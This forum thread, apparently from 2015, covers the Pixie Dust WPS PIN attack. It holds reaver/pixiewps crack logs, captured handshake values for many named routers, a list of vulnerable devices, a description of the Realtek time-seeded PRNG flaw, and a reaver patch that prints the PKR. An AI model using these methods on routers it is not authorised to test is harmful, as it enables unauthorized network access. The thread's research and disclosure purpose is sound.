[+] WPS PIN: '37********'
[+] WPA PSK: '**********'
[+] AP SSID: '**********'
[+] Nothing done, nothing to save.

soxrok2212
2015-04-08, 18:33
soxrok2212, I tried messaging you on the Google Drive sheet but it looked as though you couldn't respond... :)

Another one to add to the list as vulnerable:-

Zyxel P-2812HNU - Wikidevi here (https://wikidevi.com/wiki/ZyXEL_P-2812HNU-F3)



[P] WPS Manufacturer: ZyXEL Technology, Corp.
[P] WPS Model Number: V3.11(TUJ.3)
[+] Received M1 message
[P] AuthKey: 85:5f:fc:cb:b8:...
[+] Sending M2 message
[P] E-Hash1: 66:29:ae:09:ab:...
[P] E-Hash2: 81:a4:d5:58:f3:...
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '37********'
[+] WPA PSK: '**********'
[+] AP SSID: '**********'
[+] Nothing done, nothing to save.


Sorry I just leave that page open because I'm constantly editing it... don't really check the chat. Thanks for posting!

Calamita
2015-04-08, 19:39
Sorry I just leave that page open because I'm constantly editing it... don't really check the chat. Thanks for posting!

Ahh ok - no worries! Thanks for your hard work on this.

I'll report back with some more vulnerable devices soon hopefully :)

casperass
2015-04-08, 20:07
Why it doesn't work on Broadcoms? I thought that the exploit was for broadcoms

model number 123456

soxrok2212
2015-04-08, 20:12
Ahh ok - no worries! Thanks for your hard work on this.

I'll report back with some more vulnerable devices soon hopefully :)

If you find any Realtek AP's please post all the info you can about them.. especially the PKe! Thanks!

aanarchyy
2015-04-08, 20:35
If you find any Realtek AP's please post all the info you can about them.. especially the PKe! Thanks!

Is that helping you work on that flaw you mentioned you found?

BTW heres the one for that Encore i posted the other day


[P] E-Nonce: 0f:2f:e4:f3:ed:a6:74:d5:97:d6:33:b9:0b:e2:4c:21
[P] PKE: ef:80:72:86:a3:e9:5e:11:ac:93:cf:68:2f:d6:75:ad:d1 :b8:eb:b9:b4:b4:0a:2b:72:e4:f5:ca:70:76:6f:70:25:7 6:9a:f2:34:75:31:07:b8:24:36:2d:28:b1:8f:47:bb:d5: a5:d9:e7:6f:30:f6:ce:c5:80:55:ae:ba:0a:e9:22:67:22 :b9:69:27:71:a1:8b:2d:a6:ff:55:52:de:5d:95:ff:50:e 3:eb:e8:d9:a3:f8:7a:cd:d0:d2:ec:a0:ec:5f:6f:87:de: 56:28:80:d5:68:c6:c3:c2:0d:55:8d:43:8a:fd:b8:5c:d0 :35:0c:13:28:32:27:18:17:89:a8:4c:44:45:04:8b:1b:b a:0a:b2:c3:17:e4:80:73:00:6a:6c:fd:9b:fb:97:83:84: 76:a8:22:77:fc:c3:84:78:00:76:2d:1d:74:f5:02:f6:5d :b3:d4:d5:9a:e0:df:f8:19:b3:db:6d:75:c1:3b:13:f8:b 3:86:9f:a4:09:ff:82:d6:c1
[P] WPS Manufacturer: ENCORE Technologies, Inc.
[P] WPS Model Number: ENHWI-3GN3
[P] AuthKey: c3:d9:55:00:ba:6c:b1:1f:fc:d1:eb:68:e1:1a:30:52:de :ef:a2:ca:ca:be:eb:78:c9:3b:df:0a:02:03:9f:e1
[P] E-Hash1: 1b:25:bf:af:80:54:60:aa:b9:c6:22:34:2d:f7:c3:20:6b :ef:fe:09:d6:97:17:56:bb:4b:e0:38:ed:38:9a:96
[P] E-Hash2: 62:b5:b4:d2:17:32:c8:00:33:65:2e:a1:83:8b:2b:e7:68 :b3:3e:fb:76:4f:6c:5f:7e:bb:16:71:56:8e:04:ac

nuroo
2015-04-08, 20:42
Cisco Linksys RE1000 v2, vulnerable.

ES-1, ES-2 00:00:00:00:00............................. ralink chipset. wikidevi here (https://wikidevi.com/wiki/Linksys_RE1000_v2)

soxrok2212
2015-04-08, 21:00
Is that helping you work on that flaw you mentioned you found?

BTW heres the one for that Encore i posted the other day


[P] E-Nonce: 0f:2f:e4:f3:ed:a6:74:d5:97:d6:33:b9:0b:e2:4c:21
[P] PKE: ef:80:72:86:a3:e9:5e:11:ac:93:cf:68:2f:d6:75:ad:d1 :b8:eb:b9:b4:b4:0a:2b:72:e4:f5:ca:70:76:6f:70:25:7 6:9a:f2:34:75:31:07:b8:24:36:2d:28:b1:8f:47:bb:d5: a5:d9:e7:6f:30:f6:ce:c5:80:55:ae:ba:0a:e9:22:67:22 :b9:69:27:71:a1:8b:2d:a6:ff:55:52:de:5d:95:ff:50:e 3:eb:e8:d9:a3:f8:7a:cd:d0:d2:ec:a0:ec:5f:6f:87:de: 56:28:80:d5:68:c6:c3:c2:0d:55:8d:43:8a:fd:b8:5c:d0 :35:0c:13:28:32:27:18:17:89:a8:4c:44:45:04:8b:1b:b a:0a:b2:c3:17:e4:80:73:00:6a:6c:fd:9b:fb:97:83:84: 76:a8:22:77:fc:c3:84:78:00:76:2d:1d:74:f5:02:f6:5d :b3:d4:d5:9a:e0:df:f8:19:b3:db:6d:75:c1:3b:13:f8:b 3:86:9f:a4:09:ff:82:d6:c1
[P] WPS Manufacturer: ENCORE Technologies, Inc.
[P] WPS Model Number: ENHWI-3GN3
[P] AuthKey: c3:d9:55:00:ba:6c:b1:1f:fc:d1:eb:68:e1:1a:30:52:de :ef:a2:ca:ca:be:eb:78:c9:3b:df:0a:02:03:9f:e1
[P] E-Hash1: 1b:25:bf:af:80:54:60:aa:b9:c6:22:34:2d:f7:c3:20:6b :ef:fe:09:d6:97:17:56:bb:4b:e0:38:ed:38:9a:96
[P] E-Hash2: 62:b5:b4:d2:17:32:c8:00:33:65:2e:a1:83:8b:2b:e7:68 :b3:3e:fb:76:4f:6c:5f:7e:bb:16:71:56:8e:04:ac

Unfortunately, thats Ralink, not Realtek. Thanks though.


Cisco Linksys RE1000 v2, vulnerable.

ES-1, ES-2 00:00:00:00:00............................. ralink chipset. wikidevi here (https://wikidevi.com/wiki/Linksys_RE1000_v2)

Thanks! I'll add it now :D

Calamita
2015-04-08, 21:16
Will do! I saw your post on hackforums about this too PM me your details and I'll forward any info I find to you

soxrok2212
2015-04-08, 21:21
This is all the info I need.



Authkey:
N1 Enrollee Nonce:
N2 Registrar Nonce:
PKe:
E-Hash1:
E-Hash2:


Optional but extremely helpful information:


Router Manufacturer:
Router Model Name/Number:
Router WPS Pin:

aanarchyy
2015-04-08, 21:47
****, sorry. Didn't even notice...

Quest
2015-04-08, 22:53
This is all the info I need.


Optional but extremely helpful information:


the BSSID first 3 sets could be very useful as a quick ID chart. It's not included for most models on the wikidevi.

psicomantis
2015-04-09, 04:20
14:CF:E2:AC:E7:50
Manufacturer: Celeno Communication, Inc.
Model Number: CL1800
WPS Pin: 28944294
Vulnerable!

kcdtv
2015-04-09, 12:48
we need to know : model of chipset
model of chipset shown in the probes
thanks for your collaboration

psicomantis
2015-04-09, 15:26
we need to know : model of chipset
model of chipset shown in the probes
thanks for your collaboration

In the cases where reaver is only giving this Manufacturer: Celeno Communication, Inc. and Model Number: CL1800, where in wireshark could I get more info on the device itself?

soxrok2212
2015-04-09, 17:15
Probe request or m1 message in a WPS exachange

aanarchyy
2015-04-09, 22:36
Check your messages, soxrok2212

SubZero5
2015-04-10, 13:41
How do I make the reaver (forked) spill out the PKR too?

soxrok2212
2015-04-10, 19:30
We weren't alble to find where in reaver the PKR is debugged. It's probably in there somewhere but we just use small DH keys because the value is always 2. If you really need it without DH keys, just look in the m2 message with wireshark... "Public Key"

soxrok2212
2015-04-11, 01:53
So many of you probably know that I was looking into Realtek recently, and I noticed some fishy stuff that they do. First of all, Realtek APs ALL generated the SAME PKe. Not just on 1 occasion, not just on 1 AP, but multiple. All generated the same PKe. This seemed very strange and insecure. A person could find the secret number used in the DH Key exchange and this could be used for a MITM attack for instance, but it is not the actual problem.

Anyways, I contacted Dominique, send him some test data from a Realtek AP, a firmware blablabla, and he came back to me with the conclusion that Realtek can be cracked in 2 different, but similar ways.

1- Assuming the attacker does a WPS exchange in 1 second, E-S1 = E-S2 = N1 Enrollee Nonce
Wow, stupid engineering right? The actual PRNG is found here: https://github.com/skristiansson/uClibc-or1k/blob/master/libc/stdlib/random_r.c
The seed that this generator uses is the time. So assuming everything happens in 1 second, your E-S1 and E-S1 will equal the N1 Enrollee Nonce.

2- If your exchange doesn't happen within 1 second, you can simply brute force the seed for the PRNG (kinda similar to Broadcom). All you have to do is input different times. Then, you will have E-S1 and E-S2.

Amazing. And they thought this was a secure implementation? Nope.

The only drawback for this attack is you can't use small PKr DH Keys so at the moment, you need Wireshark or just do a hex dump to get the PKr. Not that big of a deal though. Wiire updated pixiewps within about 10 minutes of me telling him all the info and has already released it, what a champ!

wn722
2015-04-11, 05:58
In the cases where reaver is only giving this Manufacturer: Celeno Communication, Inc. and Model Number: CL1800, where in wireshark could I get more info on the device itself?
check the fcc id on sticker and use FCC ID lookup tool.
you can find on google.
or post your FCC ID here and i'll grab it for you

SubZero5
2015-04-11, 07:32
We weren't alble to find where in reaver the PKR is debugged. It's probably in there somewhere but we just use small DH keys because the value is always 2. If you really need it without DH keys, just look in the m2 message with wireshark... "Public Key"

M1, M3, M5, M7 is seen at wps_registar.c
M2, M4, M6, M8 is seen at wps_enrollee.c

The PKE is in wps_process_pubkey() of wps_registar.c so the PKR might probably be in wps_process_pubkey() of wps_enrollee.c file.

Have you tested this?

Calamita
2015-04-11, 07:43
More awesome work all!

I've not found any Realtek AP's yet - which manufacturer have you gathered data from at the moment?

soxrok2212
2015-04-11, 11:32
Right now I've only tested a Belkin F9k1105v2. I had other data to try but unfortunately they used small DH keys. Somehow, small DH keys screw up Realtek cracking. Not sure why but otherwise it does work :D

popthattif
2015-04-11, 12:05
I think this one is Realtek the wiki page shows it's Realtek but Reaver just show the name of the Router itself

Here is the Info:

Authkey:d3:91:85:00:01:57:be:86:5e:52:10:fe:73:ff: ae:c1:15:0d:d3:01:99:15:67:5a:b1:ba:a0:bb:85:c3:bf :f2
N1 Enrollee Nonce: 3a:ad:19:14:4f:5a:1d:87:1f:27:ed:1b:3c:fb:a6:18
PKe:d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0 d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91: 66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21 :25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4 d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9: 85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a :ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:3 3:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82: 51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6 :61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:1 0:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c: eb:a9:e3:b4:22:4f:3d:89:fb:2b
E-Hash1: 83:b9:24:05:e4:d2:60:c0:c3:15:7f:70:59:e2:e0:0c:86 :54:1b:7b:81:d8:50:4c:f4:01:2e:6d:f7:3f:08:8b
E-Hash2: 40:8c:4d:b0:82:29:32:04:6e:7e:f6:91:78:65:4d:3d:dd :9a:18:26:f7:28:1b:ff:32:0b:05:e4:a6:9b:17:f1
PKr:87:10:92:c3:7c:dd:9d:00:ba:80:18:16:20:d4:f4:6 0:d6:1e:1d:f2:fe:7f:e6:ed:c5:4d:49:c6:a1:82:4a:9b: f2:05:9f:6b:27:d6:f2:ee:24:e2:1e:12:66:d5:02:25:48 :92:7e:5c:3e:9d:78:2d:b2:af:49:3b:af:4f:dd:62:e0:2 8:00:6b:4c:09:62:6e:c3:19:6e:e3:c2:c6:45:44:e2:50: 0d:40:b9:0f:a6:cc:ae:13:0e:56:10:2a:c0:07:55:1e:db :07:ad:fc:29:ef:1a:ce:59:a9:ad:27:7d:0b:73:2b:4f:1 c:17:17:de:cd:06:7c:31:34:91:e6:09:ee:97:68:67:68: 66:6f:c0:05:bf:f3:a3:4e:25:1a:fd:39:a2:9a:02:86:7d :0d:4d:c1:80:b5:da:22:f7:04:1f:12:98:e4:ad:27:56:d 4:49:8a:9f:1b:01:d6:39:dd:61:c2:53:09:99:0a:dd:f9: a0:fa:3b:3e:f3:7c:f3:7b:81:f3

Router Manufacturer: Technicolor
Router Model Name/Number:Technicolor TD5

nuroo
2015-04-11, 12:15
Wanna help. The modded reaver makes getting the necessary keys super easy. The Realtek attack needs more info then modded reaver gives.
Is there a tool that will extract all needed data, easily for a noob? I want to help, not sure how to use wireshark.

Quest
2015-04-11, 12:33
FrankenScript could do that. I'll ask Slim to add it in the next version, if it's ok with everyone, whenever he gets back...

nuroo
2015-04-11, 13:23
Manufacturer
Belkin International

Model
F9K1103

pixiewps attack works, small dh keys used. (good thing, cant understand wireshark yet)
wikidevi here (https://wikidevi.com/wiki/Belkin_F9K1103)

WI1 chip1: Ralink RT3883
WI2 chip1: Ralink RT3092

t6_x
2015-04-11, 14:19
I'm working on a modification of reaver to automate the whole process.

Soon I post

t6_x
2015-04-11, 15:16
This is a example

[+] Switching mon0 to channel 9
[?] Restore previous session for 64:70:02:53:D5:FA? [n/Y] n
[+] Waiting for beacon from 64:70:02:53:D5:FA
[+] Associated with 64:70:02:53:D5:FA (ESSID: t6)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: d7:5b:a5:c1:be:a9:23:da:......
[P] PKE: d5:2e:5f:2e:58:ee:d0:3e:f2:d0:18:bc:a2:c9:be:da:91 :6e:b5:81:0f:5a:ee:30:0f:7b:00:ea:bf:86:73:86:b8:f f:24:f7:........
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[+] Received M1 message
[P] PKR: 01:38:b1:f2:38:52:5f:cc:8a:e5:0e:00:30:5f:15:b2:e3 :88:86:68:1c:c1:b4:6d:a9:80:45:dd:c8:cd:07:8a:a1:1 8:45:.......
[+] Sending M2 message
[P] E-Hash1: ee:a0:46:ba:b1:e3:80:29:cd:80:0b:b2:e2:..........
[P] E-Hash2: 59:43:8b:93:7a:79:b1:d9:ef:7a:d6:b0:50:.....
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK


I added you on skype soxrok2212

someone_else
2015-04-11, 16:04
VULNERABLE:

Modell: Hitron CVE 360
WPS Manufacturer: Ralink Technology, Corp.
WPS Model Number: RT2860
E-Nonce: 0e:3e:ee:d8:97:3d:a4:f1:ed:8d:b6:3a:9c:31:b2:30
PKE:f0:bc:40:a6:c4:8f:85:eb:e0:6b:47:96:f3:7f:7c:b d:34:a2:cd:ed:c6:79:09:f7:6f:de:75:a1:b9:4c:ef:ff: 0c:be:ff:81:e1:f6:6c:76:33:c7:6e:3c:58:79:36:af:71 :b8:20:a9:3b:11:03:0c:b9:ef:ff:3e:d8:23:29:49:62:1 3:8a:ae:1c:24:74:bf:71:89:dd:b4:ea:a7:2d:eb:04:83: fd:17:d8:84:a3:b9:11:bf:63:d8:6a:56:59:4c:bd:a2:9a :44:e8:72:95:06:82:0a:af:d3:de:45:8a:ef:6d:23:ad:3 5:12:64:39:49:e5:ab:f1:c0:07:f8:5b:5d:00:c9:d5:39: 8c:ac:79:c5:7a:40:29:fb:f5:a6:e3:c6:e5:57:cb:50:25 :ce:f1:18:8c:ae:b4:25:c3:4a:c8:5b:c3:aa:76:21:53:b 3:a1:19:14:c0:34:b8:61:21:67:c2:fa:7c:b1:a4:6a:8c: 95:97:c3:fd:4c:26:d1:97:54:52
AuthKey: 76:f9:c0:a7:4c:dc:7a:c5:2e:65:56:02:a6:df:0d:62:0d :9a:3f:a0:7a:d4:fb:94:af:72:4b:92:f1:26:3e:70
E-Hash1: 4d:0d:e2:7b:b0:0e:7b:4a:15:81:a6:0a:e1:4c:91:3d:73 :a2:c7:2e:30:45:69:89:0d:cb:0f:ab:97:d9:7f:f1
E-Hash2: d7:df:23:9a:7d:20:74:80:fe:e6:1b:eb:00:19:49:43:35 :8e:05:72:0f:e0:dd:5c:45:a9:a4:a5:dc:e0:09:14

NOT VULNERABLE:

Modell: E1000 - Linksys
Chip: Broadcom BCM4716B0 (300 MHz)

E-Nonce: f1:04:09:09:1b:b4:a2:57:17:9a:f9:07:4b:a4:a5:70
PKE:96:4e:dd:2c:9e:8a:a4:4d:77:cf:e5:31:65:39:9d:0 8:15:c8:da:8c:33:74:37:96:eb:b1:e5:83:b2:d4:fe:79: ee:cf:8b:7f:46:f3:c8:0e:01:04:ab:0c:f6:f5:b1:d2:11 :8c:ad:7a:4d:3d:b7:98:cb:75:4b:d7:37:37:01:05:a8:b 4:63:49:18:e2:2f:99:52:90:4a:54:9e:98:89:e3:d1:97: 11:36:a0:c8:da:9f:19:05:28:a1:5f:66:03:d4:21:a3:eb :be:b0:58:8e:8b:6b:48:c9:df:b4:a9:af:23:e5:ed:40:7 7:dc:c2:ee:c9:2f:c7:c7:a5:1e:79:ad:d4:34:fc:00:b3: f1:eb:6d:e9:64:6a:d7:7b:97:ea:d2:77:a3:e4:19:4b:64 :00:ce:6e:7b:06:02:6c:21:11:cb:8b:a5:a2:e8:8e:8f:5 4:5f:c7:23:5e:08:5d:00:4a:e1:94:e0:84:0e:6d:50:d5: 8b:f7:46:53:a2:32:22:cf:5a:f7
PKR:28:bc:09:26:90:73:5f:24:bb:23:9a:89:49:b5:aa:9 e:30:cd:98:60:eb:5e:52:a8:08:82:e4:75:b7:3f:84:5b: 87:a6:b0:f6:d2:9e:4d:9e:0e:c7:0e:99:b7:69:1e:d7:7b :11:4e:a8:d0:42:77:b8:48:43:36:b6:ec:2f:0f:4c:c3:0 3:98:c8:18:3b:07:1c:b4:7a:17:80:90:25:93:91:b5:16: 4f:0a:83:95:36:92:95:63:a1:fb:50:41:18:b3:c8:4d:bc :a5:43:32:87:93:a4:27:1d:b7:aa:08:7d:1f:7b:f7:20:2 0:e8:a7:e9:af:29:9c:44:95:af:7d:aa:02:81:bb:29:71: 34:67:07:57:c8:64:7a:01:f3:26:7f:98:a3:0a:27:aa:b8 :b8:ab:40:39:60:3a:51:82:ac:de:60:e5:ad:2a:bf:e5:2 c:9d:b4:2a:fb:ec:16:a2:b6:7f:03:bb:0e:bb:65:16:72: e8:86:3b:af:03:1d:57:87:ea:26
AuthKey: 98:e5:4a:b4:53:ad:1b:9a:56:ff:df:5c:65:0d:1d:0d:1b :6c:b3:8f:ec:a8:7e:c2:d4:34:28:96:e4:ee:5a:85
E-Hash1: 2a:5e:0d:41:71:48:2e:bf:42:c0:c7:5d:78:6e:d5:d5:0c :51:82:20:21:91:b2:2d:f0:74:e4:14:f5:fa:a9:fd
E-Hash2: 63:c7:21:cb:d7:7c:1d:0c:50:55:22:de:0e:e4:7c:d4:4a :94:7c:b7:61:97:07:7f:ed:0c:7c:7f:99:ba:4e:d0

Modell: TL-WR841N - TP-Link

E-Nonce: 9b:0f:a4:49:82:5b:5b:ff:ea:e6:ee:dc:15:75:f1:bc
PKE:e5:dd:ed:96:42:29:30:4c:d5:fe:00:94:4a:6c:44:d 5:f9:f3:72:f4:e1:cd:83:3d:4b:7c:00:e2:0b:33:95:a5: 75:1b:8c:0e:f4:0a:36:a6:1c:2d:63:36:fd:47:9a:65:3f :4a:26:3c:13:ac:85:75:01:31:94:cc:29:a2:ac:0b:eb:1 a:2c:5c:36:63:65:15:17:c2:36:6e:4a:71:65:be:ca:bd: d5:86:6b:db:f7:90:38:cd:a2:95:1f:af:12:eb:24:af:f1 :62:7c:df:8f:2a:bb:94:98:5e:65:62:39:8a:19:75:fa:a c:dd:98:36:f0:77:44:fe:59:9d:65:3a:cd:ed:d1:b7:52: c0:ed:93:99:a1:8d:54:5b:55:c5:8a:c0:0f:1e:c9:5e:e9 :cc:bd:b8:1e:88:e9:6d:06:a4:21:35:cc:a5:30:40:5d:4 d:08:e3:aa:92:0a:fd:0a:84:0f:d5:11:07:2e:fe:05:e3: 70:72:ea:fa:b9:93:60:85:8d:bf
AuthKey: 6c:fa:cd:30:17:d5:ee:87:b4:c7:ff:c9:de:8e:20:7c:95 :27:f6:62:f5:16:48:55:84:04:ef:85:33:40:54:43
E-Hash1: 89:c6:62:2d:c8:c3:b7:24:ef:ca:c7:79:2a:83:0e:f5:ed :9c:1d:a4:fd:20:b2:e1:61:a7:81:c1:f9:30:40:01
E-Hash2: cd:a0:79:3b:4e:12:f9:e2:c8:e7:14:34:51:3a:2d:75:eb :0f:c8:42:0b:de:4d:1d:1e:29:e1:4b:bd:d1:d7:72
PKR:28:bf:b7:94:77:e4:c2:9d:0e:f8:60:1e:d1:0f:22:2 4:50:b4:c9:06:26:86:62:ea:cb:6d:66:8e:92:ee:a2:8a: 0f:66:c2:72:cc:25:43:32:ee:d5:b6:37:02:f7:9f:9c:7d :5b:93:5b:b9:49:7b:1e:fd:20:87:5a:d8:ea:55:55:52:e 9:bc:56:0f:82:d2:61:fb:4f:e3:08:bd:10:52:36:8c:81: c9:e8:0b:97:c0:bd:10:30:72:cc:20:d2:31:6a:f2:8a:c0 :7c:a6:c2:8c:ae:43:0a:eb:0b:e0:13:76:40:91:ec:aa:5 5:46:83:f3:b3:c2:d8:1a:e5:20:16:a4:6c:68:d9:b0:68: e2:ef:35:74:d4:25:f3:a9:71:1c:19:e7:82:d3:c7:96:e7 :33:1d:97:20:5e:8c:58:71:ac:8f:33:3c:2a:d8:55:f6:7 4:51:1b:ff:e8:19:e0:8a:95:ad:53:03:40:a6:70:f7:22: b2:42:47:e3:1b:0d:28:64:a5:15

Modell: TL-WR1043ND - TP-Link

E-Nonce: 75:28:e8:1e:7e:9f:35:42:53:96:21:31:72:56:0d:12
PKE: 5f:48:b9:03:9b:ca:ce:5e:f2:50:05:5f:a8:ed:84:5a:91 :39:ce:b8:3c:f9:c9:0b:14:67:2d:f5:8d:72:86:d7:41:d 5:b2:4e:41:fd:9e:a2:8d:a5:5a:c2:70:78:e7:83:ab:98: 49:c2:c1:0a:17:4f:e1:b3:58:ee:71:e1:b1:99:33:69:07 :1b:3a:96:b7:dd:a6:8b:31:ce:0d:8a:a1:1a:63:ee:5b:d 3:d9:d4:27:cb:95:e8:22:ac:89:f1:d3:ba:cc:f2:8c:0d: 18:1b:e3:d9:77:df:bb:cf:dd:1e:13:81:26:b1:b3:4a:8c :85:06:40:17:29:04:04:d2:d2:5b:41:12:62:de:2d:ed:5 c:94:81:c0:21:18:c1:f6:5e:5c:9e:71:e5:66:44:12:fb: da:38:56:de:ec:c7:58:36:93:ee:b5:b0:72:5c:68:c1:81 :c1:8f:b0:c9:41:9f:d1:0a:72:92:56:d9:af:c5:d3:e4:7 8:b9:e7:91:66:d9:7e:8b:fb
PKR:
5f:45:13:03:8f:b9:52:a0:d4:6b:bf:5e:c2:54:7a:9f:1d :d8:47:19:ca:0f:47:71:3a:c4:ce:18:6c:1e:91:0f:2e:c 3:c1:60:1a:91:41:09:49:98:c1:d3:65:ab:15:21:39:1d: 69:bd:1a:5a:7e:ad:fb:f7:a7:c2:bb:65:3d:62:2e:02:fb :ea:31:23:4e:18:e4:77:24:da:6c:92:d6:d2:f0:ef:7a:4 e:6c:3e:df:c4:c5:57:a6:67:93:6b:38:15:7e:05:77:fa: f9:b4:35:06:5f:b5:6c:5a:0f:36:e0:6a:79:4b:e2:65:1b :03:cc:22:10:80:83:90:59:f4:ae:1f:41:f8:e4:ef:d3:0 1:f6:ad:17:b2:6d:04:51:57:53:3d:55:78:c4:69:50:3c: 11:db:e1:d2:f2:0f:9b:23:9c:81:2f:27:c6:bd:b8:3f:8d :b5:e7:5f:4f:63:3a:85:72:24:43:48:63:1e:95:08:c1:4 4:66:9a:11:43:6a:03:45:a4
AuthKey: 75:bf:65:6f:e9:51:a9:f9:6c:8a:ec:fa:1a:96:6b:52:19 :4c:22:6c:e5:e3:5c:c8:72:b9:bc:78:45:ba:e4:f8
E-Hash1: a0:34:b8:48:57:38:23:ea:8a:29:b7:c9:15:b3:8f:c8:52 :87:2f:08:7e:c9:57:e8:52:04:b5:f6:18:2d:71:4c
E-Hash2: b5:99:8a:6d:85:4b:63:e7:91:af:5b:be:4a:19:7e:eb:e7 :9c:04:3d:7c:6a:c2:2d:56:66:4b:f1:6a:47:a4:17

Modell: TL-WR1043 - TP-Link

E-Nonce: d4:1c:7d:7f:a7:9d:31:9f:a2:16:fb:4e:e2:6f:a2:80
PKE:5c:08:ff:c8:9f:3b:96:1d:9d:89:28:5a:9d:bf:8d:0 6:12:f6:a1:5f:01:7e:e0:34:e8:b0:d8:d8:c4:ff:be:00: c4:81:50:03:1b:a2:ac:b4:22:e2:49:71:fa:ff:01:2c:74 :62:4e:15:ad:4c:40:7d:1a:6a:af:f9:63:4f:f0:6d:f1:1 b:56:7f:47:15:94:8b:28:80:a2:dd:0a:28:a3:46:05:57: 5f:16:cd:e7:25:b7:50:e6:f9:f4:00:e8:35:6d:c4:15:82 :c2:2a:4d:8b:e2:63:2d:a1:cb:db:cd:c6:3e:8a:60:12:2 e:a8:53:96:0c:ca:8c:82:5e:42:f9:aa:db:4f:f0:de:8a: 37:5c:0d:b5:4f:7d:bb:47:a9:62:58:3d:db:31:e4:be:68 :39:5a:92:f9:75:9b:e6:50:ae:27:df:87:83:62:42:f1:1 3:3a:d5:a7:66:8c:cb:3c:9f:12:1d:76:0b:6d:eb:a5:84: 73:8a:60:33:19:ac:2a:74:2c:f8
AuthKey: 2f:0c:46:3c:ad:a0:35:b5:83:ab:02:9e:b7:ec:91:47:e4 :00:d9:ee:60:4d:40:49:76:92:eb:9f:1a:e3:84:cb
E-Hash1: 3c:72:7a:a4:9e:42:30:e2:81:1a:04:ef:e7:40:fd:de:f3 :b7:eb:0a:82:ad:0e:82:9d:b8:3f:a8:d0:d9:b5:06
E-Hash2: a4:cb:f4:96:31:fc:1f:2a:7e:7a:b2:6b:b3:1b:aa:2a:0a :87:d2:54:60:07:1b:4b:0e:d7:7a:f2:c6:a4:fc:7e
PKR:da:ab:2e:3f:67:b2:0c:e6:69:9f:13:68:e6:3a:78:c 5:c8:d7:ab:60:0f:1c:57:5f:e4:bd:b0:76:0d:a7:20:3f: 0a:b4:9f:2e:80:99:fa:06:fa:46:03:03:ea:7c:d4:fa:f8 :a6:ca:cc:74:e9:18:f7:f2:54:d2:e9:10:71:2f:5a:b6:7 1:df:1f:dc:d2:67:c8:19:45:41:d9:f7:a1:fc:e8:95:0c: 92:cd:59:4e:ae:5d:68:98:b3:8d:82:dc:ca:cc:ca:b8:79 :35:fa:a4:e0:5d:85:13:31:a2:ea:99:8d:bd:82:2c:b4:7 a:35:92:1a:84:c7:99:e8:0f:96:69:d0:14:5e:dc:31:09: 3b:a3:da:65:56:54:ad:4a:d3:1a:9e:e4:98:17:98:d4:29 :c0:8b:7c:75:30:b7:c8:fe:4a:65:5c:38:5b:1c:71:2e:3 5:a2:de:07:52:2e:6f:01:e0:1a:60:e6:b8:22:92:ca:62: cf:a7:4e:6a:46:62:43:48:f0:42


[B]Modell: WNR2000v4 - Netgear
Chip:Atheros AR9341

E-Nonce: 99:a2:d2:0d:f9:9d:f8:35:da:4b:a7:6d:6a:01:85:23
PKE:ac:e6:d0:a0:d3:17:7b:b0:d0:69:bc:37:23:d9:1a:2 e:dc:cb:8d:e7:de:fe:22:89:04:1e:34:5d:1d:f9:5a:25: b4:15:0f:43:c3:b2:22:97:4c:b6:8f:ec:9d:31:91:0a:76 :bc:20:98:d6:22:db:71:dc:82:6d:df:8c:19:12:6d:ad:0 f:3a:88:54:83:68:97:ae:27:18:39:84:f5:46:15:4f:f7: 38:20:60:80:56:42:76:48:d6:d3:b8:79:88:56:ca:4d:d5 :29:1a:47:1c:78:0d:31:fb:aa:23:fb:03:ee:cf:be:77:b f:2e:7d:f2:06:2d:11:f9:47:20:97:08:79:c3:47:1c:13: 58:cd:35:a1:76:a3:eb:71:14:c4:7e:39:7a:e5:15:95:b1 :fa:40:7d:b0:e2:e4:8a:af:eb:de:67:5e:c6:05:0d:3d:1 3:9d:9c:49:c4:46:a1:92:60:d7:27:a4:e2:b1:6d:52:79: da:29:c7:45:93:13:0b:e4:28:b5
AuthKey: b8:e6:b4:e6:73:e1:92:32:e1:87:11:d6:0c:10:0e:3f:05 :d4:b8:6c:0d:53:b8:50:c5:3f:d2:95:1f:6a:ab:98
E-Hash1: 6b:f2:06:6b:dd:ce:f7:4c:42:df:62:d8:60:3b:3b:2d:b9 :da:8e:da:d6:f5:df:b4:a7:2f:a2:c6:bd:61:61:87
E-Hash2: d7:e2:ce:c5:2f:0d:b4:8e:f3:a6:19:ee:38:d7:19:55:1a :ef:3a:7f:ab:93:e5:0c:df:fe:cf:bb:f1:ab:06:74

Espresso_Boy
2015-04-11, 16:12
Is this helpful?


diff --git a/src/crypto/dh_groups.c b/src/crypto/dh_groups.c
--- a/src/crypto/dh_groups.c
+++ b/src/crypto/dh_groups.c
@@ -605,6 +605,17 @@ struct wpabuf * dh_init(const struct dh_
wpabuf_put(pv, pv_len);
wpa_hexdump_buf(MSG_DEBUG, "DH: public value", pv);

+ printf("[P] PKR: ");
+ int pixiecnt = 0;
+ const u8 *pkr = wpabuf_head_u8(pv);
+ for (; pixiecnt < 192; pixiecnt++) {
+ printf("%02x", pkr[pixiecnt]);
+ if (pixiecnt != 191) {
+ printf(":");
+ }
+ }
+ printf("\n");
+
return pv;
}

soxrok2212
2015-04-11, 19:57
@someone_else Thanks for all the data! I've added it :D

psicomantis
2015-04-12, 01:52
This is a example

[+] Switching mon0 to channel 9
